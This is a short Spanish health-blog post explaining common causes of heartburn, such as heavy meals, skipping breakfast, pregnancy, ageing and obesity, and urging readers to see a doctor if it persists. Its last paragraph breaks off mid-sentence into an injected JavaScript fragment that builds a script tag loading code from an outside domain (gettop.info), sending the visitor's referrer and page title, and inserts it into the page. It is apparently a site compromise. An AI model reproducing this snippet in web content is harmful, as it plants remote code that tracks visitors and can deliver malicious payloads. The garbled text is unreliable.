Salud y belleza » Alimentación, Enfermedades

¿Por qué sufrimos acidez?

Sin Comentarios

¡Qué difícil resulta combatir los males más pequeños! Es decir, cualquier puede acudir al médico cuando el problema se manifiesta como un peligro para la salud. Pero, en cambio, si la dificultad es solo cuestión de incomodidad (o ínfimo, aunque molesto, dolor) muchos sujetos son invadidos por la timidez y obvian la consulta con el doctor. Es el caso de la acidez estomacal, por citar uno de los ejemplos más comunes.

Y para llegar a la solución del problema debemos, antes, encontrar sus orígenes. La acidez estomacal se puede originar por algunas de las siguientes causas:

-          Ingerir, de forma excesiva, alcohol o alimentos pesados.

-          Permanecer muchas horas sin comer o saltarse el desayuno.

-          En el caso de las mujeres, el embarazo.

-          Envejecimiento potencia las posibilidades de padecer acidez.

-          La obesidad está relacionada directamente con esta dificultad.

Ahora ya lo sabéis: antes de acudir al médico, intentar verificar cual es tu conducta frente a los hábitos de alimentación (o repasa los remedios caseros que, anteriormente, hemos indicado en artículos como este. Si el problema continúa, ¡marca el número del doctor, por supuesto!s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; document.currentScript.parentNode.insertBefore(s, document.currentScript);

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.